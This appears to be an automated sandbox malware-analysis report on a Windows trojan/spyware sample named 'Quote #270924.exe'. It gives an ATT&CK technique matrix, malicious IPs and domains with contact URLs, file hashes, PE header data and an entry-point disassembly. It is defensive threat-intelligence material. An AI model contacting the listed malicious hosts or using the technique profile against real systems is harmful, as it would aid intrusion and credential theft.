            Source: Yara match | File source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 412 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            Behavior Graph (figure): ID: 1520627, Sample: Quote #270924.exe, Startdate: 27/09/2024, Architecture: WINDOWS, Score: 100

            Source | Detection | Scanner | Label | Link
            Quote #270924.exe | 37% | ReversingLabs | Win32.Trojan.Generic
            Quote #270924.exe | 100% | Avira | HEUR/AGEN.1321671
            Quote #270924.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            Name | Malicious | Antivirus Detection | Reputation
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                          unknown
                                                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.alphaaistore.com/The_Christian_Faith.cfm?fp=ptQ1PhmefSIPL%2BuLjwFIjR1UQknnb2Bgv3CJh%2BHmSRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.register.com?trkID=WSTm3u15CWRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://i2.cdn-image.com/__media__/js/min.js?v2.3Robocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Robocopy.exe, 00000004.00000002.3989125037.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixRobocopy.exe, 00000004.00000002.3987313418.000000000631A000.00000004.10000000.00040000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003F3A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.martaschrimpf.info/Schrimpf.cfm?fp=pO0JpCU5Mh6f5g1arwsF3FAaMtZCoz%2F4No65eqcRoFM4S6840KTgRobocopy.exe, 00000004.00000002.3988995247.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, Robocopy.exe, 00000004.00000002.3987313418.0000000005B40000.00000004.10000000.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000002.3986193651.0000000003760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
162.0.238.43 | www.tomtox.top | Canada | 22612 | NAMECHEAP-NETUS | true
65.21.196.90 | 030003302.xyz | United States | 199592 | CP-ASDE | true
172.67.165.25 | www.b5x7vk.agency | United States | 13335 | CLOUDFLARENETUS | true
160.251.148.20 | www.nojamaica.net | Japan | 7506 | INTERQGMOInternetIncJP | true
208.91.197.39 | www.alphaaistore.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
208.91.197.27 | www.martaschrimpf.info | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
38.47.233.19 | 2q63f.top | United States | 174 | COGENT-174US | true
3.33.130.190 | tracy.club | United States | 8987 | AMAZONEXPANSIONGB | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | true
                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                            Analysis ID:1520627
                                                                                                                                                                            Start date and time:2024-09-27 17:28:14 +02:00
                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                            Overall analysis duration:0h 8m 56s
                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                            Report type:full
                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                            Run name:Run with higher sleep bypass
                                                                                                                                                                            Number of analysed new started processes analysed:7
                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                            Number of injected processes analysed:2
                                                                                                                                                                            Technologies:
                                                                                                                                                                            • HCA enabled
                                                                                                                                                                            • EGA enabled
                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                            Sample name:Quote #270924.exe
                                                                                                                                                                            Detection:MAL
                                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@12/9
                                                                                                                                                                            EGA Information:
                                                                                                                                                                            • Successful, ratio: 80%
                                                                                                                                                                            HCA Information:
                                                                                                                                                                            • Successful, ratio: 87%
                                                                                                                                                                            • Number of executed functions: 38
                                                                                                                                                                            • Number of non-executed functions: 326
                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                                                                                                                                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                            • VT rate limit hit for: Quote #270924.exe
Time | Type | Description
11:30:07 | API Interceptor | 7563192x Sleep call for process: Robocopy.exe modified
                                                                                                                                                                            • www.030002060.xyz/oap7/
                                                                                                                                                                            DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002721.xyz/i28e/
                                                                                                                                                                            yyyyyyyy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                            • www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
No context
Process: C:\Windows\SysWOW64\Robocopy.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                                                                                                                                                            Process:C:\Users\user\Desktop\Quote #270924.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):289792
                                                                                                                                                                            Entropy (8bit):7.9937449075373985
                                                                                                                                                                            Encrypted:true
                                                                                                                                                                            SSDEEP:6144:3pHGWmBNol9389aqor+LGgNlrN9P9hl48PILlFS89eZvSyZj2z9uoASU6:3pmWYol9389Vor+imNNp97nPILlcZvS9
                                                                                                                                                                            MD5:8BF7C1AD41C40B026B7FFA0802D3F219
                                                                                                                                                                            SHA1:AEBA85B2D078740B02CCAFD7C28F159B063103B2
                                                                                                                                                                            SHA-256:E1E0F97490057B5DD025A2883C87613CB11AA154971FCF0406BFC4ED828BEAD7
                                                                                                                                                                            SHA-512:CF641D7ECAB37E03DDA6D126A67FBA8C7DAAC39771E360B128A56025F7D1EB511E1E92C1FBE1D4CA879C9BA18A5DB25978F02B55539176059A7C830F3C031167
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Entropy (8bit):7.542938203344601
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                            File name:Quote #270924.exe
                                                                                                                                                                            File size:1'366'661 bytes
                                                                                                                                                                            MD5:1018070ffeb3f5fa59a306fa6e6b0f57
                                                                                                                                                                            SHA1:df752f8bc6b8b9be639a4135c06f401a6701fc35
                                                                                                                                                                            SHA256:5da3520f7feeae6c6ec79f99c5cc9b5ff73bfd57b29ca80b3aa2fd1a718df59e
                                                                                                                                                                            SHA512:96f6e5c2a32366069193296007206e925482468d65dc2993757347d5c05cd95b5bc296239a92ca9bc2bc0161e8141f178f2f38856c9a84653b91118047722413
                                                                                                                                                                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCUg4YE5n/Dbbdh9QVl9/UKIGbjw5:7JZoQrbTFZY1iaCoYmf5hWricw5
                                                                                                                                                                            TLSH:F855F121F5C69036C2B326B09E7EF36A963D79360336D19727C82E315EA05416B3A773
                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                                                                            Icon Hash:1733312925935517
                                                                                                                                                                            Entrypoint:0x4165c1
                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                                                                            Instruction
                                                                                                                                                                            call 00007EFED8C77DCBh
                                                                                                                                                                            jmp 00007EFED8C6EC3Eh
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            int3
                                                                                                                                                                            push ebp
                                                                                                                                                                            mov ebp, esp
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                                                                                                                            mov ecx, dword ptr [ebp+10h]
                                                                                                                                                                            mov edi, dword ptr [ebp+08h]
                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                            mov edx, ecx
                                                                                                                                                                            add eax, esi
                                                                                                                                                                            cmp edi, esi
                                                                                                                                                                            jbe 00007EFED8C6EDBAh
                                                                                                                                                                            cmp edi, eax
                                                                                                                                                                            jc 00007EFED8C6EF56h
                                                                                                                                                                            cmp ecx, 00000080h
                                                                                                                                                                            jc 00007EFED8C6EDCEh
                                                                                                                                                                            cmp dword ptr [004A9724h], 00000000h
                                                                                                                                                                            je 00007EFED8C6EDC5h
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            and edi, 0Fh
                                                                                                                                                                            and esi, 0Fh
                                                                                                                                                                            cmp edi, esi
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop edi
                                                                                                                                                                            jne 00007EFED8C6EDB7h
                                                                                                                                                                            jmp 00007EFED8C6F192h
                                                                                                                                                                            test edi, 00000003h
                                                                                                                                                                            jne 00007EFED8C6EDC6h
                                                                                                                                                                            shr ecx, 02h
                                                                                                                                                                            and edx, 03h
                                                                                                                                                                            cmp ecx, 08h
                                                                                                                                                                            jc 00007EFED8C6EDDBh
                                                                                                                                                                            rep movsd
                                                                                                                                                                            jmp dword ptr [00416740h+edx*4]
                                                                                                                                                                            mov eax, edi
                                                                                                                                                                            mov edx, 00000003h
                                                                                                                                                                            sub ecx, 04h
                                                                                                                                                                            jc 00007EFED8C6EDBEh
                                                                                                                                                                            and eax, 03h
                                                                                                                                                                            add ecx, eax
                                                                                                                                                                            jmp dword ptr [00416654h+eax*4]
                                                                                                                                                                            jmp dword ptr [00416750h+ecx*4]
                                                                                                                                                                            nop
                                                                                                                                                                            jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                                                            nop
                                                                                                                                                                            inc cx
                                                                                                                                                                            add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                                                            inc cx
                                                                                                                                                                            add byte ptr [ebx], ah
                                                                                                                                                                            ror dword ptr [edx-75F877FAh], 1
                                                                                                                                                                            inc esi
                                                                                                                                                                            add dword ptr [eax+468A0147h], ecx
                                                                                                                                                                            add al, cl
                                                                                                                                                                            jmp 00007EFEDB0E75B7h
                                                                                                                                                                            add esi, 03h
                                                                                                                                                                            add edi, 03h
                                                                                                                                                                            cmp ecx, 08h
                                                                                                                                                                            jc 00007EFED8C6ED7Eh
                                                                                                                                                                            rep movsd
                                                                                                                                                                            jmp dword ptr [00000000h+edx*4]
                                                                                                                                                                            Programming Language:
                                                                                                                                                                            • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                            • [C++] VS2010 SP1 build 40219
                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                            • [ASM] VS2010 SP1 build 40219
                                                                                                                                                                            • [RES] VS2010 SP1 build 40219
                                                                                                                                                                            • [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
